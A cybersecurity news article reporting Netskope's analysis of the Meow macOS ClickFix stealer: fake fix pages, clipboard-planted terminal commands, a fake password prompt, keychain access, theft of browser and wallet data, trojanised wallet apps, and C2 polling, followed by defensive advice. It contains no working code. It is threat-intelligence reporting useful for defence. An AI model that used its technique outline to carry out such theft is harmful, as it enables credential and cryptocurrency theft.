Do Son 
macOS ClickFix AppleScript stealer diagram showing the Meow macOS stealer infection chain | Image: Netskope Threat Labs
At a Glance
- Malware Family: Meow macOS stealer (AppleScript-based infostealer and RAT)
- Threat Actor: Suspected Russian-speaking attacker
- Targets or Victims: macOS users in technology, media, and business sectors across Asia, North America, and Oceania
- Scale: 25 short-lived lure domains
- Jurisdiction or Status: Under active security investigation
- Source: Netskope Threat Labs
TL;DR
Netskope Threat Labs discovered a dangerous macOS ClickFix AppleScript stealer active since May 2026. This threat acts as a remote access trojan. It targets cryptocurrency wallets.
Attackers use fake troubleshooting websites to trick victims. They deploy a macOS ClickFix AppleScript stealer into computer memory. This malware steals system passwords and modifies cryptocurrency apps.
Delivery
The campaign uses deceptive websites to trick targets. Attackers build fake macOS utility pages and GitHub repositories. They design these pages to mimic trusted tech brands. The website instructs the victim to fix an error manually. Specifically, it asks them to copy a terminal command. A malicious JavaScript script manipulates the clipboard data. The victim pastes this hidden command into their terminal. Execution triggers a fileless download process. A hidden script fetches the Meow macOS stealer payload. The attack stays entirely in memory. It leaves zero initial files on the hard drive. Analysts at Microsoft Security also observed similar tactics recently. Threat actors host malicious commands on popular blogging sites. They trick users looking for disk optimization advice. The landing page filters victims based on their user agent. It ensures Mac users receive the correct AppleScript payload.
Infection Chain
The first stage loader evaluates the victim environment. It checks the system keyboard language. The loader stops immediately if it finds a Russian layout. This filter confirms suspected Russian-speaking attacker origins. Next, the loader sends victim telemetry to a remote server. It then downloads the AppleScript payload. The terminal passes this script directly into memory. The script uses native tools to maintain a low profile. This living off the land technique evades many antivirus scanners. The malware displays a fake system password prompt. This dialog box mimics native macOS security alerts. It lacks a close button to force user interaction. The victim enters their password to dismiss the annoying box. The malware validates this password using native directory services. It then uses the verified password to unlock the login keychain. This step grants access to encrypted system storage keys.
Command-and-Control and Data-Exfiltration Behavior
The Meow macOS stealer copies data from twelve web browsers. It specifically targets saved passwords, session cookies, and form autofill data. Furthermore, the malware targets specific cryptocurrency extensions. It copies data from over one hundred browser extensions. The threat also modifies desktop cryptocurrency wallet software. It targets Exodus, Atomic Wallet, Ledger Live, and Trezor Suite. The malware downloads a modified application archive from the server. It forcefully kills the running wallet process. Then, it replaces the core application file with a malicious version. It applies an ad-hoc code signature to bypass Gatekeeper warnings. The malware deletes local staging artifacts to remove forensic evidence. The compressed archive uploads silently via curl. The C2 server manages all connections using the HTTP protocol. A background process runs every sixty seconds. This process fetches new commands from the server. It gives the operator persistent remote access. The attacker can push new shell code at any time.
Targeted Data Types
This malware collects a wide variety of personal information. It copies entire cryptocurrency wallet directories. These folders often contain unencrypted seed phrases. It also targets messaging platforms like Telegram and Discord. The malware steals active session tokens from these applications. It even accesses the Apple Notes database directly. It copies local documents from the desktop folder. It searches up to three directory levels deep. The script searches for specific file extensions. It targets text files, spreadsheets, and credential databases. It limits the total file size to avoid detection. It stops copying after reaching thirty megabytes.
Defense or Detection Guidance
Security teams must block the known malicious domains. The Netskope GitHub repository lists the full threat indicators. Furthermore, administrators should monitor terminal usage closely. Look for unexpected clipboard execution patterns. Organizations must educate staff about social engineering tricks. Remind users to never paste untrusted commands into terminal windows. Defenders should check the system launch daemon folders. Look for unusual files named com.apple.accountsd. This filename indicates a successful persistent compromise. Reinstall any desktop cryptocurrency wallets from official sources immediately.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
